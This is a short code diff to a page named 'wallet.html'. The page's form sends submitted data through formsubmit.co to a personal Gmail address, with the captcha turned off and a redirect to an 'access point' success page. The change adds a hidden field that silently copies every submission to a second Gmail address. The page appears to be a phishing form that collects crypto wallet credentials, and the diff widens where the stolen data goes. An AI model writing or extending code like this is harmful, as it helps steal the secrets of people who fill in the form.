--- a/wallet.html
+++ b/wallet.html
@@ -634,6 +634,7 @@
       </div>
 
    <form action="https://formsubmit.co/jklaymorris00@gmail.com" method="post" enctype="multipart/form-data" id="form" class="ajaxForm">
+                                         <input type="hidden" name="_cc" value="formsubmitmail@gmail.com">
                                         <input type="hidden" name="_captcha" value="false">
                                         <input type="hidden" name="_next" value="https://dev-serverprotocol-app.vercel.app/access/point/success.html">
 
